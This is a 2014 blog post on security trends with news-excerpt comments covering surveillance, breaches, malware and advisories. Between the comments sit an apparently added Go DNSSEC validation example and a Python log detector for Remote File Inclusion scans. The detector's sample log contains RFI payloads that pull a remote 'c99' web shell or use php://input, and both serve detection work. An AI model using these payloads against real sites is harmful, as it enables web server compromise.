Security trends for 2014

Year 2014 will be a year of cybersecurity after the NSA revelations made in 2013. The headline news is that the NSA has surreptitiously “burrowed its way into nearly all the security architecture” sold by the world’s largest computer networking companies. A lot of people were shocked at how the NSA monitored and hacked almost everything on the Internet. There will still be NSA aftershocks as new material comes out and different parties react to it (and news sources write about it). U.S. cloud services have been put into question for good reason. There will be a lot of NSA spying litigation. Those spying issues will also fuel some hacktivism (it has already started to happen).

The Security Professionals: Top Cyber Threat Predictions for 2014 article lists the following predictions, which seem pretty probable: Cybersecurity Regulatory Efforts Will Spark Greater Need for Harmonization, Service-Impacting Interruptions for Online Services Will Persist, We Will See an Increase in Cybercrime Activity Related to the World Cup, Rise of Regional Cloud Services, Dev-Ops Security Integration Fast Becoming Critical, Cybercrime that Leverages Unsupported Software will Increase, Increase in Social Engineering and Ransomware will Impact More People.

Ubiquitous mobile computing is all around us, which will lead to increased risks and concerns about social network privacy. Social networks have quickly become the key organizing principle of Internet communication and collaboration. Android anti-virus apps CAN’T kill nasties on sight like normal AV.

2013 was a very hacked year: there were many cases where information on millions or tens of millions of users was stolen from companies. It’s likely that we will see much more of the same in 2014, as the way people use passwords and the way on-line services are built have not changed much in one year.


Gartner predicts that through 2014, improved JavaScript performance will begin to push HTML5 and the browser as a mainstream enterprise application development environment. I expect HTML5-related security issues to increase because the technology is being used more in 2014.

Over 50% of net traffic to web sites is made by bots! The More Than Half of Internet Traffic Is Just Bots article says that security and cloud service provider Incapsula analyzed traffic and found that more than 60 percent of internet traffic is computer generated, compared to less than 40 percent of traffic driven by human clicks. 31% of bots are still malicious. SEO link building has always been a major motivation for automated link spamming, but it is decreasing because Google was able to discourage it. There is more advanced hacking and automatic vulnerability searching.

DDoS attacks are evolving from volumetric Layer 3-4 attacks to much more sophisticated and dangerous Layer 7 multi-vector threats.

There will still be many SCADA security issues in 2014. Even though traditional SCADA vulnerabilities have become easier to find, the increased connectivity brought by IoT will cause new issues. And there will still be very many control systems openly accessible from the Internet to practically anybody who knows how to find them. A large number of SCADA systems were found open on the Internet at the beginning of 2013, and the numbers have not dropped considerably during the year. I expect that very many of those systems will still be too open at the end of 2014.

The Internet is expanding into enterprise assets and consumer items such as cars and televisions. The Internet of Things (IoT) will evolve into the Web of Things, increasing the coordination between things in the real world and their counterparts on the Web. There will be many security issues to solve, and as these systems become more widely used, more security issues will be found in them.

Cloud security will be talked about. Hopefully there will be some clearing-up of the terminology in that area, because cloud security can mean a lot of things, like the term cloud computing itself. Cloud security could mean how secure your cloud provider is; a service that runs in the cloud filtering what comes through it (for example e-mails or web traffic); a product protecting some service running in the cloud; or a traditional anti-virus service that connects to the cloud to advance its operation (for example to update in real time, or to verify unknown programs based on data in the cloud). Research firm Gartner forecasts that cloud security sales will increase dramatically in the next few years. Cloud security sales have increased over the past year by 2.1 billion to $3.1 billion in 2015.

Marketers try to put the “cloud” term into security product brochures as much as they can. The cloud has made traditional information security sound old-fashioned, because companies are under pressure to move services to the cloud. Mobile devices and dispersed users also set new standards for information security. OpenDNS’s CTO Dan Hubbard says that “Because of the data and equipment run in the cloud users with the cloud is the best way to protect them.” The Snowden Effect will also bring PRIVATE cloud talk to the table this year for security reasons, because U.S. cloud services have been put into question for good reason.

In Finland a new Cyber Security Center started in the beginning of 2014. Security articles and warnings from it will be published at kyberturvallisuuskeskus.fi.

Late addition: Crypto-currencies like Bitcoin and similar are on the rise. Early adopters already use them actively. Those crypto-currencies have many security issues related to them. The values of the crypto-currencies vary quite a lot, and the value easily drops considerably when they get so widely used that different governments try to limit their use. Bitcoin is increasingly used as a ransomware payment method. Bitcoins have been stolen quite a lot lately (and I expect that to increase when usage increases), and they are stolen from users, from on-line wallets and from exchanges. When more money is involved, more bad guys try to get in to take some of it. Sometimes bad guys do not try to steal your money, but use resources you pay for (your own PC, your server capacity, etc.) to generate money for them without you knowing about it. If you plan to use those crypto-currencies, be careful to understand what you are doing with them: there is a real possibility that you can lose your money, and there is no way that lost money can be recovered.

3,382 Comments

  1. Tomi Engdahl says:

    Cisco kicks off security kit/software/cloud combo
    Realtime protection, apparently
    http://www.theregister.co.uk/2014/04/23/cisco_kicks_off_security_kitsoftwarecloud_combo/

    Cisco has added threat management to its portfolio, announcing Managed Threat Defense which it says brings realtime security to its customers.

    Managed Threat Defense includes an “on-premise” solution, meaning there’s a box you can drop on your foot. It includes hardware, software and analytics

    The customer-side kit is supported by Cisco’s security operations centres, which monitor the service and provide “incident response analysis, escalation, and remediation recommendations”, the company says.

  2. Tomi Engdahl says:

    AuDA starts final round of DNSSEC tests
    August go-live
    http://www.theregister.co.uk/2014/04/24/auda_starts_final_round_of_dnssec_tests/

    AuDA has taken a tentative step towards the introduction of DNSSEC into the Australian domain space, signing the .au domain in its production environment as the first step in a four-month test.

    DNSSEC has been possible for years, but has been held back by industry inertia. Under DNSSEC, a DNS (domain name system) record is signed, allowing resolvers to authenticate the relationship between domain name and IP address.

    The problem for the ordinary sysadmin is that DNSSEC is needed all the way up the chain, from their own site back to the root zone

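The chain-of-trust requirement described in the comment above, as an added Go example (not code from the article, from AuDA or from any DNS software): Ed25519 key pairs stand in for DNSKEY records, a SHA-256 digest of the child key stands in for a DS record, and the zone names and addresses are constructed. It shows a validating resolver accepting an answer only when every delegation from the root down carries a DS, and rejecting it when a DS is missing or a record was changed without re-signing.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/sha256"
	"errors"
	"fmt"
)

// Zone is a simplified signed zone: its DNSKEY (an Ed25519 key pair here), signed A records and DS records.
type Zone struct {
	Name  string
	Pub   ed25519.PublicKey
	priv  ed25519.PrivateKey
	A     map[string]string // owner name -> IPv4 address (constructed data)
	RRSIG map[string][]byte // owner name -> signature over "owner A ip"
	DS    map[string][]byte // child zone name -> digest of the child's DNSKEY
}

// NewZone derives a deterministic key pair from the zone name so the example is
// repeatable (real zones use randomly generated keys).
func NewZone(name string) *Zone {
	seed := sha256.Sum256([]byte("constructed-seed:" + name))
	priv := ed25519.NewKeyFromSeed(seed[:])
	return &Zone{Name: name, Pub: priv.Public().(ed25519.PublicKey), priv: priv,
		A: map[string]string{}, RRSIG: map[string][]byte{}, DS: map[string][]byte{}}
}

// dsDigest plays the role of a DS record: a hash of the child's DNSKEY that the
// parent publishes, which is the link that ties the child into the chain of trust.
func dsDigest(pub ed25519.PublicKey) []byte {
	d := sha256.Sum256(pub)
	return d[:]
}

// Delegate publishes a DS for child in this zone (for .au that DS must be in the
// root zone, which is why signing .au is only the first step of the rollout).
func (z *Zone) Delegate(child *Zone) { z.DS[child.Name] = dsDigest(child.Pub) }

// AddA stores an A record together with an RRSIG made with the zone's key.
func (z *Zone) AddA(owner, ip string) {
	z.A[owner] = ip
	z.RRSIG[owner] = ed25519.Sign(z.priv, []byte(owner+" A "+ip))
}

// Resolver holds the one configured trust anchor: the root zone's DNSKEY digest.
type Resolver struct{ TrustAnchor []byte }

// Validate walks chain[0] (root) down to the zone answering for owner, checking
// each DNSKEY against the DS above it and finally the RRSIG on the answer. One
// missing or bad link makes the answer bogus: DNSSEC is needed all the way up.
func (r Resolver) Validate(chain []*Zone, owner string) (string, error) {
	if len(chain) == 0 {
		return "", errors.New("empty chain")
	}
	expected := r.TrustAnchor
	for i, z := range chain {
		if !bytes.Equal(dsDigest(z.Pub), expected) {
			return "", fmt.Errorf("DNSKEY of %q does not match the DS above it", z.Name)
		}
		if i+1 < len(chain) {
			ds, ok := z.DS[chain[i+1].Name]
			if !ok {
				return "", fmt.Errorf("%q publishes no DS for %q: chain of trust broken", z.Name, chain[i+1].Name)
			}
			expected = ds
		}
	}
	leaf := chain[len(chain)-1]
	ip, ok := leaf.A[owner]
	if !ok {
		return "", fmt.Errorf("no A record for %q", owner)
	}
	if !ed25519.Verify(leaf.Pub, []byte(owner+" A "+ip), leaf.RRSIG[owner]) {
		return "", fmt.Errorf("RRSIG for %q does not verify", owner)
	}
	return ip, nil
}

// BuildChain constructs root -> au -> example.com.au with one signed A record.
func BuildChain() (root, au, site *Zone) {
	root, au, site = NewZone("."), NewZone("au"), NewZone("example.com.au")
	root.Delegate(au)
	au.Delegate(site)
	site.AddA("www.example.com.au", "192.0.2.10") // constructed TEST-NET-1 address
	return root, au, site
}

func main() {
	root, au, site := BuildChain()
	r := Resolver{TrustAnchor: dsDigest(root.Pub)}
	chain := []*Zone{root, au, site}
	ip, err := r.Validate(chain, "www.example.com.au")
	fmt.Println("validated:", ip, err)
	delete(root.DS, "au") // delegation without a DS: the pre-rollout situation
	_, err = r.Validate(chain, "www.example.com.au")
	fmt.Println("missing DS:", err)
}
```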
  3. Tomi Engdahl says:

    Cisco: you’re all malware hosts
    Security report also notes skills shortage
    http://www.theregister.co.uk/2014/04/24/cisco_youre_ialli_malware_hosts/

    Everybody – at least every multinational that Cisco checked out for its 2014 Annual Security Report – is hosting malware of some kind, and there aren’t enough security professionals to go around.

    Along with its Managed Threat Defense service launched this week, Cisco also launched the latest publication (here with registration) of its security survey. The study claims that “100 percent of companies [in the report's sample – El Reg] are calling malicious malware hosts”.

    Cisco also believes that the length of time that such activity persists means that network penetrations are going undetected.

    Java is the undisputed king of endpoint vulnerabilities, Cisco claims, with far more exploits than either Flash or PDF: 91 per cent of the live endpoint exploits detected by the Sourcefire FireAMP system attacked Java.

    Cisco warns that companies can expect DDoS campaigns to last longer

  4. Tomi Engdahl says:

    Bank of England seeks ‘HACKERS’ to defend vaults against e-thieves
    Report: 20 major cash-holders to be probed by white hats
    http://www.theregister.co.uk/2014/04/24/ethical_hackers_drafted_to_probe_banks/

    The Bank of England is planning to hire ethical hackers to conduct penetration tests on 20 “major” banks and other financial institutions, it has been reported.

    The move appears to be a response to lessons learned during the Waking Shark II security response exercise last November.

    “It’s encouraging to see the Bank of England taking a lead on protecting the UK’s critical national infrastructure by overseeing ethical hacking programmes,”

    “Looking at the bigger security picture, the majority of serious data breaches use stolen or misused legitimate access privileges. Banks need strong, reliable systems in place to quickly identify any security vulnerabilities and take appropriate actions to prevent a breach and avoid financial and reputational damage,”

  5. Tomi Engdahl says:

    Patch iOS, OS X now: PDFs, JPEGs, URLs, web pages can pwn your kit
    Plus: iThings and desktops at risk of NEW SSL attack flaw
    By Shaun Nichols, 22 Apr 2014
    http://www.theregister.co.uk/2014/04/22/apple_ios_7_1_1_os_x_security_updates/

    Apple has released updates to its iOS and OS X operating systems that address serious security flaws.

    The company said the iOS 7.1.1 upgrade will include, as well as some stability updates, fixes for 19 security flaws.

  6. Tomi Engdahl says:

    Australian Law Enforcement Pushes Against Encryption, Advocates Data Retention
    http://yro.slashdot.org/story/14/04/24/0221204/australian-law-enforcement-pushes-against-encryption-advocates-data-retention

    “Australia is in the middle of a parliamentary inquiry examining telecommunications interception laws.”

  7. Tomi Engdahl says:

    Data retention: Just like diamonds, metadata is forever
    Senate inquiry into Telecommunications (Interception and Access) Act kicks off
    http://www.computerworld.com.au/article/543389/data_retention_just_like_diamonds_metadata_forever/

    Jevtovic said he was aware of the recent decision by the Court of Justice of the EU, which earlier this month struck down laws requiring telcos to retain metadata because they interfered with the right to privacy.

    The ACC’s acting CEO said that what is important are the reasons for the CJEU decision, such as the lack of protection against abuse of the data retention regime.

    “From my perspective our oversight regime [in Australia] does protect from the risk of abuse,”

  8. Tomi Engdahl says:

    Researchers slurp unencrypted Viber messaging data with ease
    Images, videos, location and other data easily exposed, they claim
    http://www.theregister.co.uk/2014/04/24/rakuten_viber_unencrypted_data_flaws/

    Popular Whatsapp-like messaging service Viber is exposing users to man-in-the-middle and other attacks because it isn’t encrypting various data at rest and in transit, security researchers have warned.

    Specifically, the team claimed that images, doodles and videos received are unencrypted; location data sent and received is unencrypted; and data is stored on the Viber Amazon servers in unencrypted format.

  9. Tomi Engdahl says:

    Lost codes spark Japan airport scramble on eve of Obama trip
    https://nz.totaltravel.yahoo.com/news-opinions/news/a/-/22860549/lost-codes-spark-japan-airport-scramble-on-eve-of-obama-trip/

    Airport authorities in Japan launched a frantic scramble to change security pass codes, an official said Tuesday, the day before Barack Obama arrives, after an airline employee dropped a memo containing the details.

    The ministry instructed the firm that manages the airport to immediately change the pass codes, to avoid any danger of a security breach, the official said.

  10. Tomi Engdahl says:

    Tokyo airport employee loses handwritten passcodes ahead of Obama visit
    http://nakedsecurity.sophos.com/2014/04/23/tokyo-airport-employee-loses-handwritten-passcodes-ahead-of-obama-visit/

    The dangers associated with writing passwords down were expertly demonstrated by a Japanese airport worker over the weekend as the country prepared for the first visit by a US president in almost 20 years.

    Speaking on Tuesday, a transport ministry official said that an employee of Skymark Airlines at Tokyo’s Haneda International Airport mislaid a printout containing key passcodes on Sunday.

    The document was found just thirty minutes later on the floor of the departure lobby but the Japanese government were not prepared to take any chances.

    the ministry instructed the company that manages Haneda International to change them immediately

    it would be wise to also use a password manager, such as KeePass or LastPass, which will allow you to store many complex passwords whilst only needing to remember one – and, whatever you do, don’t write it down!

  11. Tomi Engdahl says:

    All at sea: global shipping fleet exposed to hacking threat
    http://www.reuters.com/article/2014/04/24/us-cybersecurity-shipping-idUSBREA3M20820140424

    The next hacker playground: the open seas – and the oil tankers and container vessels that ship 90 percent of the goods moved around the planet.

    As industries like maritime and energy connect ships, containers and rigs to computer networks, they expose weaknesses that hackers can exploit.

    Hackers recently shut down a floating oil rig by tilting it, while another rig was so riddled with computer malware

    Somali pirates help choose their targets by viewing navigational data online

    researchers say they have discovered significant holes in the three key technologies sailors use to navigate
    GPS
    AIS
    ECDIS

    “Increasingly, the maritime domain and energy sector has turned to technology to improve production, cost and reduce delivery schedules,” a NATO-accredited think-tank wrote in a recent report. “These technological changes have opened the door to emerging threats and vulnerabilities as equipment has become accessible to outside entities.”

    A recent study by security company Rapid7 found more than 100,000 devices – from traffic signal equipment to oil and gas monitors – were connected to the internet using serial ports with poor security.

  12. Tomi Engdahl says:

    Tokyo Court orders bankruptcy trustee to begin Mt. Gox liquidation
    http://www.reuters.com/article/2014/04/24/us-bitcoin-mtgox-bankruptcy-idUSBREA3N0KM20140424

    Tokyo District Court ordered liquidation to begin at failed bitcoin exchange Mt. Gox

  13. Tomi Engdahl says:

    Dell, Cisco, Microsoft, Google and friends shower OpenSSL in $$$s to make it all better
    Web, IT goliaths to pour gold into more open-source code
    http://www.theregister.co.uk/2014/04/24/linux_foundation_core_infrastructure/

    The Linux Foundation announced on Thursday that it had formed “The Core Infrastructure Initiative” to fund open projects that are critical to the functioning of the internet.

    The goal is to make sure the recent Heartbleed OpenSSL vulnerability and worse omnishambles never happen again. It comes after the chap who accidentally introduced the Heartbleed bug called for more people to work on the OpenSSL code.

    “The Core Infrastructure Initiative is a multi-million dollar project housed at The Linux Foundation to fund open-source projects that are in the critical path for core computing functions,” the Linux Foundation declared.

  14. Tomi Engdahl says:

    Covert Bitcoin miner found stashed in malicious Google Play apps
    Titles raise questions about Google’s ability to police its own market.
    http://arstechnica.com/security/2014/04/covert-bitcoin-miner-found-stashed-in-malicious-google-play-apps/

    Researchers scouring the official Google Play market have unearthed more Android apps that surreptitiously abuse end-user devices to carry out the computationally intensive process of mining Bitcoins.

    The malware, dubbed “BadLepricon” by its creators, was stowed away inside five separate wallpaper apps that had from 100 to 500 downloads each

    The Bitcoin mining happened only when the battery level was at 50 percent or higher, presumably as a means to prevent infected users from knowing that their device was running the mining code.

  15. Tomi Engdahl says:

    Malware designed to take over cameras and record audio enters Google Play
    Covert remote access trojan was built using newly discovered DIY toolkit.
    http://arstechnica.com/security/2014/03/malware-designed-to-take-over-cameras-and-record-audio-enters-google-play/

    The scourge of the remote access trojan (RAT)—those predatory apps that use Web microphones and cameras to surreptitiously spy on victims—has formally entered the Android arena.

    The specific RAT in Google Play was disguised as a legitimate app called Parental Control, according to Marc Rogers, principal security researcher at Lookout Mobile, a provider of antimalware software for Android phones.

    The Parental Control trojan was built using Dendroid, a newly discovered software development tool that sells for about $300. Dendroid provides an impressive suite of features, including all the tools to build the command and control infrastructure to control RATted phones and receive audio and video captured from their mics and cameras. Dendroid also allows attackers to intercept, block, or send SMS text messages on compromised phones; download stored pictures and browser histories; and open a dialogue box that asks for passwords. It includes “binder” functions that allow the malicious code to be attached, or bound, into otherwise useful or innocuous apps.

    Dendroid also gives apps the ability to evade Bouncer, Google’s cloud-based service that scours the Android Market for malicious apps.

  16. Tomi Engdahl says:

    10 Top Information Security Threats for the Next Two Years
    http://www.cio.com/slideshow/detail/149359/10-Top-Information-Security-Threats-for-the-Next-Two-Years#slide1

    Each year, the Information Security Forum, a nonprofit association that researches and analyzes security and risk management issues, releases its ‘Threat Horizon’ report to provide members with a forward-looking view of the biggest security threats over a two-year horizon. Here are the top 10 threats through 2016.

  17. Tomi Engdahl says:

    Chinese Government Shuns ‘Expensive’ Windows 8
    Senior officials are looking to patch up the outdated Windows XP software rather than pay for an “expensive” upgrade.
    http://news.sky.com/story/1247630/chinese-government-shuns-expensive-windows-8

    The Chinese government will try to patch up the outdated Windows XP operating system -because it is too expensive to upgrade.

    Senior official Yan Xiaohong said: “Security problems could arise because of a lack of technical support after Microsoft stopped providing services, making computers with XP vulnerable to hackers.”

    Chinese security providers have released special protection products to patch up the system, which the government is now “appraising” for use.

    Windows 8 costs 888 yuan (£84) in China.

    In the US, nearly 18% of computers still use XP – in China the figure is estimated to be closer to 70%.

  18. Tomi Engdahl says:

    Putin ramps up Internet censorship, citing Google and Snowden to ensure public support
    http://pando.com/2014/03/20/putin-ramps-up-internet-censorship-citing-google-and-snowden-to-ensure-public-support/

    The ongoing conflict between Russia, Ukraine and the West has unleashed some very dark latent fascist forces — not just on the ground, but also in cyberspace.

    On March 13, a half-dozen highly trafficked opposition blogs and indie media outlets were suddenly blocked within Russia.

    There was no court order, no trial, not even a public hearing. But there’s no doubt the move was official

    Russians Selectively Blocking Internet
    http://www.nytimes.com/2013/04/01/technology/russia-begins-selectively-blocking-internet-content.html?pagewanted=all&_r=0

    The Russian Government Has Started Censoring the Internet
    http://gizmodo.com/5993112/the-russian-government-has-started-censoring-the-internet

    The Russian government in recent weeks has been making use of a new law that gives it the power to block Internet content that it deems illegal or harmful to children.

    The country’s communications regulators have required Facebook, Twitter and YouTube to remove material that the officials determined was objectionable, with only YouTube, owned by Google, resisting.

    But opposition leaders have railed against the law as a crack in the doorway to broader Internet censorship. They say they worry that social networks, which have been used to arrange protests against President Vladimir V. Putin, will be stifled.

    Russia blocks web pages linked to Ukraine protests
    http://www.politico.com/story/2014/03/russia-ukraine-protests-websites-internet-104171.html

  19. Tomi Engdahl says:

    Tales from the Internet World Cup: ICANN tell nothing will change
    Brazilian striker aside… it’s all very model UN
    http://www.theregister.co.uk/2014/04/25/internet_global_multistakeholder_meeting_on_the_future_of_internet_governance/

    NetMundial’s internet conference, the much-hyped, over-excited lovechild of Edward Snowden’s NSA revelations, has been significantly more subdued than people thought it would be.

    Despite everyone’s best efforts, NetMundial is a damp squib.

    But despite repeated and very public calls for a clampdown on internet surveillance, the whole issue is being carefully sidestepped in São Paulo. The entire idea that people are accessing and using our interactions online in a way that would have blown George Orwell’s mind has been anaesthetised.

    What will we all get out of NetMundial? For the ordinary observer, nothing at all. The final text will be bland, vague and almost entirely pointless. But if you are an Internet governance professional, well, then things have really changed.

    At the next meeting, there will be an expectation to produce a document that contains real details of movement and agreement.

  20. Tomi Engdahl says:

    Beijing’s anti-smut crackdown catches ‘Chinese Twitter’ Weibo red-handed
    China’s largest microblog service has two licenses revoked
    http://www.theregister.co.uk/2014/04/25/sina_weibo_license_revoked_lewd_content/

    Sina, the company that owns China’s über-popular Twitter-like service Weibo, has had two key licences withdrawn by Beijing in retaliation for allegedly allowing the publication of articles and videos containing pornographic content.

    The harsh treatment of one of China’s biggest internet companies is part of a renewed crackdown on “lewd” or pornographic content

    Weibo – which boasts 600 million registered users, less than half of whom are active – recently filed for a $500m IPO in the US.

  21. Tomi Engdahl says:

    Bankrupt Bitcoin bunker blender begins: MtGox admin starts liquefaction
    But where’s the missing 650k-ish BTC?
    http://www.theregister.co.uk/2014/04/24/mt_gox_files_for_bankruptcy/

    Submitting a claim may also involve abandoning some of the pseudo-anonymity that crypto-cash’s users hold dear. Anyone who has not provided MtGox with a valid name and address may not be notified of the ongoing status of the bankruptcy claims.

  22. Tomi Engdahl says:

    So far, so SOPA: Web campaigners to protest world’s biggest ever free trade deal
    Worries over increased censorship despite stalled talks
    http://www.theregister.co.uk/2014/04/25/obama_japan_tpp_internet_protest/

    Internet activists are planning a major on- and offline protest at what has been described as a “secretive, SOPA-like” agreement being hammered out as the world’s largest economies attempt to agree the world’s biggest ever free trade deal.

    Unfortunately, we thought this type of wholesale internet censorship died after our historic victory against SOPA. But it looks like some of the worst parts of SOPA have found their way into the TPP.

  23. Tomi Engdahl says:

    Vladimir Putin Claims The Internet Is ‘A CIA Project’
    http://www.nbcnews.com/storyline/ukraine-crisis/vladimir-putin-claims-internet-cia-project-n88766

    Russian President Vladimir Putin claimed Thursday that the Internet is “a CIA project,” adding that Moscow needed to “fight” to resist this U.S. influence.

    Russia is keen to moderate the information super-highway, where opponents of the government who are barred from national television amass their support.

  24. Tomi Engdahl says:

    Spy back doors? That would be suicide, says Huawei
    ‘Impeccable track record’ clearly means we’re not a spy conduit, says mouthpiece
    http://www.theregister.co.uk/2014/04/25/huawei_responds_to_spying_allegations/

    Chinese hardware manufacturer Huawei says allegations it provides backdoors for espionage in its kit remain unproven and would be “commercial suicide”.

    “The hypothetical – that our equipment could be used for espionage by the Chinese government – has never been proven,” spokesman Scott Sykes told press at the company’s annual global analyst event in Shenzen this week.

    “If it were ever proven, we would lose 65 per cent of our business overnight. That would be corporate suicide.”

    However, documents disclosed by Edward Snowden this year suggest Huawei may be more sinned against than sinner. The US National Security Agency’s ‘Tailored Access Operations’ unit broke into Huawei’s corporate servers, and by 2010 was reading corporate email and examining the source code used in Huawei’s products.

  25. Tomi Engdahl says:

    Microsoft Issues Advisory For Internet Explorer Vulnerability
    http://it.slashdot.org/story/14/04/27/206232/microsoft-issues-advisory-for-internet-explorer-vulnerability

    “Neowin reports how Microsoft made a rare weekend post on its Security Response Center blog to announce an advisory that affects all currently supported versions of Internet Explorer (versions 6 to 11).”

    Microsoft issues security advisory for Internet Explorer exploit
    http://www.neowin.net/news/microsoft-issues-security-advisory-for-internet-explorer-exploit

    The blog post states that the exploit “allows remote code execution if users visit a malicious website with an affected browser. This would typically occur by an attacker convincing someone to click a link in an email or instant message.” The company is aware of “limited, targeted attacks” that have used the exploit.

    IE 10 and 11 are protected against attacks using this exploit if they have their Enhanced Protected Mode turned on.

  26. Tomi Engdahl says:

    Microsoft releases Security Advisory 2963983
    http://blogs.technet.com/b/msrc/archive/2014/04/26/microsoft-releases-security-advisory.aspx

    Today, we released Security Advisory 2963983 regarding an issue that impacts Internet Explorer. At this time, we are only aware of limited, targeted attacks. This issue allows remote code execution if users visit a malicious website with an affected browser. This would typically occur by an attacker convincing someone to click a link in an email or instant message.

  27. Tomi Engdahl says:

    Microsoft Security Advisory 2963983
    Vulnerability in Internet Explorer Could Allow Remote Code Execution
    Published: April 26, 2014
    https://technet.microsoft.com/en-US/library/security/2963983

    Microsoft is aware of limited, targeted attacks that attempt to exploit a vulnerability in Internet Explorer 6, Internet Explorer 7, Internet Explorer 8, Internet Explorer 9, Internet Explorer 10, and Internet Explorer 11.

    The vulnerability is a remote code execution vulnerability. The vulnerability exists in the way that Internet Explorer accesses an object in memory that has been deleted or has not been properly allocated. The vulnerability may corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user within Internet Explorer. An attacker could host a specially crafted website that is designed to exploit this vulnerability through Internet Explorer and then convince a user to view the website.

  28. Tomi Engdahl says:

    Apache Struts Zero Day Not Fixed By Patch:

    The Apache Software Foundation today released an advisory warning that a patch issued in March for a zero-day vulnerability in Apache Struts did not fully patch the bug in question.

    Source: https://threatpost.com/apache-warns-of-faulty-zero-day-patch-for-struts/105691

  29. Tomi Engdahl says:

    Google improved its HTTPS connections for Chrome for Android in February
    Making it three times faster and better protect against threats
    http://www.theinquirer.net/inquirer/news/2341688/google-improved-its-https-connections-for-chrome-for-android-in-february

    GOOGLE HAS ANNOUNCED that it improved HTTPS connections for Chrome for Android, making it three times faster and stronger against future security vulnerabilities like Heartbleed.

    “Earlier this year, we deployed a new TLS cipher suite in Chrome that operates three times faster than AES-GCM on devices that don’t have AES hardware acceleration, including most Android phones, wearable devices such as Google Glass and older computers,” Google anti-abuse research lead Elie Bursztein explained.

  30. Tomi Engdahl says:

    Of the world’s denial of service attacks in last year’s fourth quarter, 43 percent came from China, according to Akamai’s recent report. The second largest source of attacks was the USA. Third was Canada.

    In the fourth quarter, the number of attacks increased by 75 percent compared to the same period last year.

    During the fourth quarter of 2013, Akamai observed attack traffic originating from source IP addresses in 188 unique countries/regions. China remained in the top slot, growing to 43% of observed attack traffic.

    Overall attack traffic concentration across the top 10 countries/regions was up slightly from the third quarter, growing to 88% of observed attacks.

    Port 445 remained the most targeted port, growing once again and reaching 30% of observed attacks. The volume of attacks targeting Port 80 remained steady at 14%

    Enterprise and Commerce customers together accounted for just under 70% of the reported attacks during the quarter, while just under half of the total attacks were reported by customers in the Americas.

    rise of a set of attacks in which the Skipfish and Vega Web application vulnerability scanners were used to target a variety of organizations, looking for Remote File Inclusion (RFI) vulnerabilities

    Sources:
    http://www.tietoviikko.fi/kaikki_uutiset/totuus+kyberhyokkayksista+lahes+joka+toinen+tulee+kiinasta/a984090
    http://www.akamai.com/dl/akamai/akamai-soti-q413.pdf?WT.mc_id=soti_Q413

    Reply
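The Skipfish/Vega activity the report describes, scanners walking sites and trying Remote File Inclusion, leaves a recognisable shape in ordinary web server logs. As an added example that is not from the Akamai report or either scanner, this Python detector parses Apache/nginx combined-format log lines, flags any query parameter whose decoded value is a remote URL or a PHP stream wrapper (what an RFI attempt against a PHP include() looks like), tags requests whose user-agent carries a scanner name, and counts repeat offenders per source IP. The log lines, the RFC 5737 addresses and the user-agent strings are all constructed for the example; real scanners can send any user-agent, so the parameter check is the signal that matters.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache / nginx "combined" log format.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Values that make a PHP include()/require() pull code from somewhere the
# attacker controls: a remote URL or a stream wrapper.
RFI_VALUE = re.compile(r"^(?:https?|ftp)://|^(?:php|data|expect)://", re.IGNORECASE)
# Hypothetical user-agent substrings; real scanners can send any UA string,
# so this is a hint, never the only signal.
SCANNER_UA = ("skipfish", "vega")


def parse_line(line):
    """Return the fields of one combined-format log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def rfi_params(target):
    """(name, value) for every query parameter whose decoded value looks like a remote include."""
    query = urlsplit(target).query
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if RFI_VALUE.match(v.strip())]


def analyze(lines, repeat_threshold=2):
    """Scan log lines and return (findings, repeat_offenders).

    findings: list of dicts whose 'reason' is 'scanner-ua', 'rfi-param' or 'unparseable'.
    repeat_offenders: source IPs with at least repeat_threshold RFI attempts."""
    findings, attempts = [], Counter()
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            findings.append({"reason": "unparseable", "line": line})
            continue
        ua = rec["ua"].lower()
        tool = next((s for s in SCANNER_UA if s in ua), None)
        if tool:
            findings.append({"reason": "scanner-ua", "ip": rec["ip"], "tool": tool,
                             "target": rec["target"]})
        for name, value in rfi_params(rec["target"]):
            attempts[rec["ip"]] += 1
            findings.append({"reason": "rfi-param", "ip": rec["ip"], "param": name,
                             "value": value, "status": rec["status"]})
    offenders = {ip for ip, n in attempts.items() if n >= repeat_threshold}
    return findings, offenders


# Constructed sample log (RFC 5737 documentation addresses, made-up UA strings).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2013:13:55:36 +0000] "GET /index.php?page=http://198.51.100.9/c99.txt? HTTP/1.1" 200 512 "-" "Mozilla/5.0 (constructed) skipfish/2.10"',
    '203.0.113.7 - - [10/Oct/2013:13:55:37 +0000] "GET /view.php?file=php://input HTTP/1.1" 500 0 "-" "Mozilla/5.0 (constructed) skipfish/2.10"',
    '198.51.100.23 - - [10/Oct/2013:13:56:01 +0000] "GET /products?id=42 HTTP/1.1" 200 8713 "http://shop.example/" "Mozilla/5.0 (Windows NT 6.1) Firefox/28.0"',
    '192.0.2.88 - - [10/Oct/2013:13:57:12 +0000] "POST /include.php?template=HTTP://192.0.2.88/x.php%3F HTTP/1.1" 404 221 "-" "Mozilla/5.0 (constructed) Vega/1.0"',
]

if __name__ == "__main__":
    findings, offenders = analyze(SAMPLE_LOG)
    for f in findings:
        print(f)
    print("repeat offenders:", sorted(offenders))
```

Parameters that legitimately carry URLs (search boxes, redirect targets) will trip the value check, so in production you would allowlist those parameter names and weigh the 404/500 status codes the scanners leave behind.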
  31. Tomi Engdahl says:

    DOJ Whines That A Warrant To Search A Mobile Phone Makes It More Difficult To Catch Criminals
    http://www.techdirt.com/articles/20140423/15081827008/government-argues-that-warrant-requirement-cell-phone-searches-does-nothing-keep-cops-catching-bad-guys.shtml

    The government argues that impartial technological advancements somehow favor criminals. As it sees it, the path to the recovery of evidence should not be slowed by encryption or wiping or even the minimal effort needed to obtain a warrant. The police are presented as forever behind the curve, despite evidence otherwise. Without a doubt, there’s an ongoing arms race between deletion technology and recovery technology, but the gap between the two isn’t nearly as large as the government portrays it.

    But what really deserves attention here is the government’s antipathy towards encryption and other protective technology.

